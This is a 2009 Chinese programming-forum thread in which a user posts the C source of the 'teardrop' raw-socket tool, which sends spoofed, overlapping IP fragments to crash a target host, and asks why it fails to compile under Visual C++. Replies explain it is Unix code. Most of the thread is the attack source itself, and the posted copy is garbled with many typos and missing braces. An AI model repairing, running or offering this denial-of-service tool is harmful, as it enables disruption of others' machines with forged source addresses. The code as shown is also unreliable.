程序源代码解读 高手参看隐藏ip的问题!

qihuanfengyun 2009-03-05 11:29:57
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
#define FIX(n) (n)
#else
#define FIX(n) htons(n)
#endif

#define IP_MF 0x2000
#define IPH 0x14
#define UDPH 0x8
#define PADDING 0x1c
#define MAGIC 0x3
#define COUNT 0x1

void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *,int);
void send_frags(int,u_long,u_long,u_short,u_short);

int main(int argc,char **argv)
{
int one=1,count=0,i,rip_sock;
u_long src_ip=0,dst_ip=0;
u_short src_prt=0,dst_prt=0;
struct in_addr addr;

fprintf(stderr,"teardrop route|daemon9\n\n");

if ((rip_sock=sock(AF_INET,SOCK_RAW,IPPROTO_RAW))<0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL, (char *)&one,sizeof(one))<0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc<3) usage(argv[0]);
if (!(src_ip=name_resolve(argv[1])) || !(dst_ip=name_resolve(argv[2])))
{
fprintf(stderr,"what the hell kind of IP address is that?\n");
exit(1);
}
while ((i=getopt(argc,argv,"s:t:n:")) !=EOF)
{
switch (i)
{
case 's':
src_prt=(u_short)atoi(optarg);
break;
case 't':
dst_prt=(u_short)atoi(optarg);
break;
case 'n':
count=atoi(optarg);
break;
default :
usage(argv[0]);
break;
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt=(random() % 0xffff);
if (!dst_prt) dst_prt=(random() % 0xffff);
if (!count) count=C)UNT;

fprintf(stderr,"Death on flaxen wings:\n");
addr.s_addr=src_ip;
fprintf(stderr,"Form: %15s.%5d\n",inet_ntoa(addr),dst_prt);
addr.s_addr=dst_ip;
fprintf(stdeer, "To: %5s.%5d\n",inet_ntoa(addr),src_prt);
fprintf(stdeer, "Amt: %5\n",count);
fprintf(stdeer, "[");

for(i=0;i<count;i++)
{
send_frags(rip_sock,src_ip,dst_ip,src_prt,dst_prt);
fprintf(stdeer, "b00m");
usleep(500);
}
fprintf(stdeer,"]\n");
return (0);
void send_frags(int sock,u_long src_ip,U_long dst_ip,u_short src_prt,u_short dst_prt)
{
u_char *packet = NULL, *p_ptr = NULL
u_char byte;
struct sockaddr_in sin;

sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.saddr = dst_ip;

packet=(u_char *)malloc(IPH+UDPH+PADDING);
p_ptr=packet;
bzero((u_char *)p_ptr,IPH+UDPH+PADDING);

byte=0x45;
memcpy(p_ptr,&byte,sizeof(u_char));
p_ptr +=2;
*((u_short *)p_ptr)=htons(242);
p_ptr +=2;
*((u_short *)p_ptr)|=FIX(IP_MF);
p_ptr +=2;
*((u_short *)p_ptr)=0x40;
byte=IPPROTO_UDP;
memcpy(p_ptr+1,&byte,sizeof(U_char));
p_ptr +=4;
*((u_long *)p_ptr)=src_ip;
p_ptr +=4;
*((u_long *)p_ptr)=dst_ip;
p_ptr +=4;
*((u_short *)p_ptr)=honts(src_prt);
p_ptr +=2;
*((u_short *)p_ptr)=honts(dst_prt);
p_ptr +=2;
*((u_short *)p_ptr)=honts(8+PADDING);

if(sendto(sock,packet,IP+UDP+PADDING,0,(struct sockaddr*)&sin,sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}


p_ptr=&packet[2];
*((u_short *)p_ptr)=FIX(IPH + MAGIC + 1);
p_ptr +=4;
*((u_short *)p_ptr)=FIX(MAGIC);

if(sendto(sock,packet,IPH + MAGIC + 1,0,(struct sockaddr *)&sin,sizeof(struct sockaddr)) == - 1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);

u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;

if((addr.s_addr = inet_addr(host_name)) == -1)
{
if(!(host_ent=gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr,host_ent->h_length);
}
return (addr.s_addr);
}

void usage(u_char *name)
{
fprintf(stderr,"%s src_ip dst_ip [-s src_prt] [-t dst_prt] [-n how_many]\n",name);
exit(0);
}
为什么在windows VC++ 6.0编译时提示找不到unistd.h就是添加上unistd.h也不行。是不是该代码在linux上运行的。望高手指点。
...全文
148 8 打赏 收藏 转发到动态 举报
写回复
用AI写文章
8 条回复
切换为时间正序
请发表友善的回复…
发表回复
qihuanfengyun 2009-03-07
  • 打赏
  • 举报
 回复
这是《网络攻防原理》书上的代码估计在unix上跑的可能性大。谢谢了!
xhy_851221 2009-03-05
  • 打赏
  • 举报
 回复
[Quote=引用 4 楼 hairetz 的回复:]
为什么在windows VC++ 6.0编译时提示找不到unistd.h就是添加上unistd.h也不行。是不是该代码在linux上运行的。望高手指点。

汗...原来还有这一句..
该代码要在Unix like系统下跑的,你可以用虚拟机在你的windows下装个linux再运行.
[/Quote]
up
猫已经找不回了 2009-03-05
  • 打赏
  • 举报
 回复
为什么在windows VC++ 6.0编译时提示找不到unistd.h就是添加上unistd.h也不行。是不是该代码在linux上运行的。望高手指点。

汗...原来还有这一句..
该代码要在Unix like系统下跑的,你可以用虚拟机在你的windows下装个linux再运行.
猫已经找不回了 2009-03-05
  • 打赏
  • 举报
 回复
这个主要是要熟悉TCP/IP,关键是把解析包头的看懂.
fox000002 2009-03-05
  • 打赏
  • 举报
 回复
unistd.h 的意思不就是 Unix Standard 之类的意思吗

当然不适用于 VC
white1977 2009-03-05
  • 打赏
  • 举报
 回复
这个代码是linux系统下编译执行的。
猫已经找不回了 2009-03-05
  • 打赏
  • 举报
 回复
[Quote=引用 6 楼 qihuanfengyun 的回复:]
谢谢各位老大了!小弟收获颇丰起码知道可以直接对网络层的,底层东西直接写代码进行操作!
[/Quote]
楼主..win下也有socket的API的..跟unix的系统调用类似的.
qihuanfengyun 2009-03-05
  • 打赏
  • 举报
 回复
谢谢各位老大了!小弟收获颇丰起码知道可以直接对网络层的,底层东西直接写代码进行操作!
全新 PowerDesigner 16.6 数据库设计与建模(精讲版)
PowerDesigner数据库设计与建模,本课程讲述了如何使用PowerDesigner进行数据库分析与建模。包括企业架构及业务流程分析,实体关系模型设计,面向对象和数据库建模的集成等功能模块进行项目需求分析、结构规划、生成框架代码,以及如何从现有系统逆向转工程代码,生成所需系统模型的全过程。软件设计师专题课程的第一篇>请参看https://edu.csdn.net/course/detail/24752。本课程作者联络QQ:494657271
BT源代码分析
概述: 相对于 tracker 服务器来说,BT客户端要复杂的多,Bram Cohen 花了一年 full time 的时间来完成 BT,我估计其中大部分时间是用在 BT 客户端的实现和调试上了。 由于 BT 客户端涉及的代码比较多,我不能再象分析 tracker 服务器那样,走上来就深入到细节之中去,那样的话,我写的晕晕糊糊,大家看起来也不知所云。所以第一篇文章先来谈谈客户端的功能、相关协议
深入理解程序从编译到运行
From:http://blog.chinaunix.net/uid-22327815-id-3540305.html 从Hello World说程序运行机制:http://www.sohu.com/a/132798003_505868 C/C++中如何在main()函数之前执行一条语句?:https://www.zhihu.com/question/26031933 (深入理解计算机系统...
MIPL程序解读(1)
这是一年前研究移动ipv6时候写的一个文档。贴出来共享。 1、总体说明以MIPL项目组的mipv6-2.0.2版本为样本,进行程序分析。MIPL项目组的MIPv6的实现分成两部分,一部分是对内核的修改,对内核打了一个长长的补丁;另一部分是用户空间的一个守护进程。这一部分仅仅是MIPv6的用户空间部分的代码,内核空间的代码另外的文档进行解读。其结构可以用下图来表示(摘录自NEPL (NE
Snort源码分析
       Snort由几大软件模块组成,这些软件模块采用插件方式与Snort结合,扩展起来非常方便,例如有预处理器和检测插件,报警输出插件等,开发人员也可以加入自己编写的模块来扩展Snort功能。所有这些子模块都建立在数据包截获库函数接口Libpcap的基础上,Libpcap为他们提供了一个可移植的数据包截获和过滤机制。 snort源代码主要由以下几个主要部分构成: snort.c   s...
Linux/Unix社区

23,120

社区成员

74,507

社区内容

发帖
与我相关
我的任务
社区描述
Linux/Unix社区 应用程序开发区
社区管理员
  • 应用程序开发区社区
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章